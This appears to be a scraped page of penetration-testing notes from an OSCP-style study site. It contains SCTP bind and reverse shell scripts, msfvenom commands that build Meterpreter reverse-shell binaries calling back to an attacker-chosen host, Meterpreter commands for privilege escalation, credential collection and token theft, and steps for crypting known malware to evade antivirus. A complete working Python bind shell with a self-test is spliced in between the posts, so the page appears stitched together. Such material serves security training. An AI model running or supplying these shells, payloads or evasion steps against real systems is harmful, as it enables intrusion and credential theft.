Latest notes for PenTesting - MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: unknowndevice64 2019-05-18 13:27:31

#!/usr/bin/env python2
import termios
import select
import socket
import os
import fcntl
import argparse
from sctp import *

class PTY:
    def __init__(self, slave=0, pid=os.getpid()):
        # apparently python GC's modules before class instances so, here
        # we have some hax to ensure we can restore the terminal state.
        ...


Score: 0

By: unknowndevice64 2019-05-18 13:27:35

#!/usr/bin/python2
"""
Python Bind SCTP PTY Shell - testing version
infodox - insecurety.net (2013)
Binds a PTY to a SCTP port on the host it is ran on.
Use the sctp_pty_shell_handler.py script to connect.
"""
import os
import pty
import socket
from sctp import *

lport = 31337 # XXX: CHANGEME

def main()...


Score: 0

By: unknowndevice64 2019-05-18 13:27:38

#!/usr/bin/python2
"""
Reverse Connect SCTP PTY Shell - testing version
infodox - insecurety.net (2013)
For an excellent listener use the following socat command:
socat file:`tty`,echo=0,raw sctp-listen:PORT
Alternatively, use sctp_pty_shell_handler.py
"""
import os
import pty
import socket
from sctp import...


Score: 0
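The three scripts above share one mechanism: pty.fork() a shell so it gets a real controlling terminal, then shuttle bytes between the pty master and a connected socket with select(). The following is an added Python 3 example of that relay, not infodox's code from the posts: it serves the shell over whatever stream socket it is handed (TCP by default; socket.IPPROTO_SCTP is the swap-in for the SCTP transport on a Linux kernel with the sctp module loaded, which is an assumption here), it assumes /bin/sh exists, and its self-test drives the shell through a local socketpair so it runs offline.

```python
#!/usr/bin/env python3
"""PTY-backed shell relayed over a stream socket (added example, not the
original bind/reverse SCTP scripts).  Assumptions: /bin/sh exists; the
self-test uses a socketpair instead of a network socket."""
import os
import pty
import select
import signal
import socket


def serve_pty_shell(sock, shell="/bin/sh"):
    """Spawn `shell` on a fresh pseudo-terminal and relay bytes between the
    pty master and `sock` until either side closes.  Returns the shell's
    raw wait status.  The transport (TCP, UNIX, SCTP) is irrelevant here."""
    pid, master_fd = pty.fork()
    if pid == 0:
        # Child: the pty slave is stdin/stdout/stderr and the controlling
        # terminal, so prompts, echo and job control behave like a login.
        try:
            os.execv(shell, [shell, "-i"])
        finally:
            os._exit(127)  # only reached if exec fails
    sfd = sock.fileno()
    try:
        while True:
            readable, _, _ = select.select([master_fd, sfd], [], [])
            if master_fd in readable:
                try:
                    data = os.read(master_fd, 4096)
                except OSError:        # EIO: shell exited, slave side closed
                    break
                if not data:
                    break
                try:
                    sock.sendall(data)
                except OSError:        # peer vanished mid-write
                    os.kill(pid, signal.SIGKILL)
                    break
            if sfd in readable:
                data = sock.recv(4096)
                if not data:           # peer hung up: do not leave an orphan shell
                    os.kill(pid, signal.SIGKILL)
                    break
                os.write(master_fd, data)
    finally:
        os.close(master_fd)
    _, status = os.waitpid(pid, 0)
    return status


def bind_shell(port, host="0.0.0.0", proto=socket.IPPROTO_TCP):
    """Bind variant: accept one client and hand it to serve_pty_shell().
    proto=socket.IPPROTO_SCTP gives the SCTP transport of the original
    scripts (assumption: kernel SCTP support is present)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM, proto)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((host, port))
    listener.listen(1)
    client, _ = listener.accept()
    listener.close()
    with client:
        return serve_pty_shell(client)


def run_command_over_shell(cmd, timeout=5.0):
    """Offline self-test: fork a server on one end of a socketpair, send
    `cmd` then `exit`, and return everything the shell wrote back
    (prompts and echoed input included, since it is a real tty)."""
    here, there = socket.socketpair()
    child = os.fork()
    if child == 0:
        here.close()
        serve_pty_shell(there)
        os._exit(0)
    there.close()
    here.sendall(cmd + b"\nexit\n")
    here.settimeout(timeout)
    out = b""
    try:
        while True:
            chunk = here.recv(4096)
            if not chunk:
                break
            out += chunk
    except socket.timeout:
        pass
    here.close()
    os.waitpid(child, 0)
    return out


if __name__ == "__main__":
    print(run_command_over_shell(b"printf '%s%s\\n' pty_ ok").decode(errors="replace"))
```

Because the shell sits on a real tty, the raw-mode socat listener from the reverse-shell post (`socat file:\`tty\`,echo=0,raw ...`) is the right client: local echo off, so keystrokes are echoed once by the remote pty and Ctrl-C reaches the remote shell instead of killing the listener.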


List payloads

msfvenom -l payloads

Binaries

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msf...


Score: 0


Information Gathering
getuid
getpid
getprivs
sysinfo
screenshot
run winenum
run scraper
run checkvm
run credcollect
run get_local_subnets

Escalating Privs
ps then migrate
getsystem

Tokens (use incognito)
list_tokens -u
impersonate_token
steal_token ...


Score: 0


There are many pages on the web documenting quick reverse shell one liners.
Pentestmonkey and Bernardo Damele have both created a good few posts between
them but I wanted to recapture what they’ve got for my notes purposes.
(It’s easier for me to find stuff if it’s in one place).
All credit goes to both of those guys where I got all t...


Score: 0

By: unknowndevice64 2019-05-18 12:26:48

Penetration Testing: What You Should Know
About Kali Linux
About Penetration Testing
Legal
The megacorpone.com Domain
Offensive Security Labs

Getting Comfortable with Kali Linux
Finding Your Way Around Kali
Managing Kali Linux Services
The Bash Environment
Intro to Bash Scripting

The Essential Tools
...


Score: 0




Crypting Known Malware with Software Protectors

One such open source crypter, called Hyperion

cp /usr/share/windows-binaries/Hyperion-1.0.zip .
unzip Hyperion-1.0.zip
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3...


Score: 0




See Metasploit Unleashed Course in the Essentials

Search for exploits using Metasploit GitHub framework source code:
https://github.com/rapid7/metasploit-framework
Translate them for use on OSCP LAB or EXAM.

Metasploit

Metasploit requires PostgreSQL

systemctl start postgresql

To enabl...


Score: 1




Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port

apt-get install rinetd

cat /etc/rinetd.conf

# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80

SSH Local Port Forwarding: supports bi-directional communicatio...


Score: 0